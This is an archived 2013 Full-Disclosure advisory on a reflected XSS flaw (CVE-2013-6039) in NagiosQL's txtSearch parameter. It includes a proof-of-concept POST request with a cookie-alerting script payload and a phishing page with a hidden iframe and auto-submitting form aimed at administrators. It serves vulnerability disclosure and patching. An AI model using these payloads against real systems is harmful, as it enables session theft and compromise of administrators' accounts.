lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 5 Dec 2013 08:11:55 -0200
From: William Costa <william.costa@...il.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Reflected XSS Attacks XSS vulnerabilities in
	NagiosQL 3.2.0 Servicepack 2 (CVE: CVE-2013-6039)

I. VULNERABILITY
-------------------------
Reflected XSS Attacks XSS vulnerabilities in NagiosQL 3.2.0 Servicepack 2

II. BACKGROUND
-------------------------
NagiosQL is a web based administration tool designed for Nagios, but might also work with forks. It helps you to easily build a complex configuration with all options, manage and use them. NagiosQL is based on a webserver with PHP, MySQL and local file or remote access to the Nagios configuration files.

III. DESCRIPTION
-------------------------
Has been detected a Reflected XSS vulnerability in NagiosQL in all pages that containing input for search, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.

The code injection is done through the parameter "txtSearch" in all pages

IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter “txtSearch” correctly.

Malicious Request ("txtSearch")
Vulnerable:
POST /nagiosql/admin/hostdependencies.php HTTP/1.1
Host: 10.0.1.120
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate
Referer: http://10.0.1.120/nagiosql/admin/hostdependencies.php Cookie: PHPSESSID=hhr9lv77k9d4vvh0cauco48206
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 198

txtSearch=aaaa%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F script%3E&modus=checkform&hidModify=&hidListId=&hidLimit=0&hidSortBy=1 &hidSortDir=ASC&hidSort=0&selModify=none&selTargetDomain=1HTTP/1.1 200 OK

Date: Wed, 30 Oct 2013 16:15:34 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre- check=0

Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3440
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/htmlV.
BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-------------------------
  NagiosQL test only 3.2.0 Servicepack 2
`
VII. SOLUTION
-------------------------
All data received by the application and can be modified by the user, before making any kind of transaction with them must be validated .

After click in search.
VIII. REMOTE EXPLOIT
-----------------------------
Are two pages an that user access and another contains code for send via post the XSS

Send phishing email For administrator for a page with follow code: Name: page.html

<html>
<body>
<H1>BLAH BLAH BLAH</H1>
<p>Your bases are not belong to me, dun worry bro</p>
<? if (isset($_GET["done"])) {
die();
}?><iframe src="http://yoursite.com/xss/index.php" width="1" height="1" frameborder="0"></iframe>
</body>
</html>

Name: index.php
<html>
<head>
<style>
.xss {display: none;
}
</style>
</head>
<body onload="XSS.submit();">
<form id="xss" action="http://sitevictim/nagiosql/admin/hosts.php" method="post" name="XSS">
<input name="txtSearch" value=""><script>alert(document.cookie);</script>"</input>

</form>
</body>
</html>

BY
F3nr1r (William Costa)
william.costa@...il.com




REFERENCES



http://cwe.mitre.org/data/definitions/79.html

http://www.nagiosql.org/

http://www.nagiosql.org/forum8/solved-issues/3270-security-hotfix-for-%20nagiosql-3-2-sp2.html#3690

 


Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists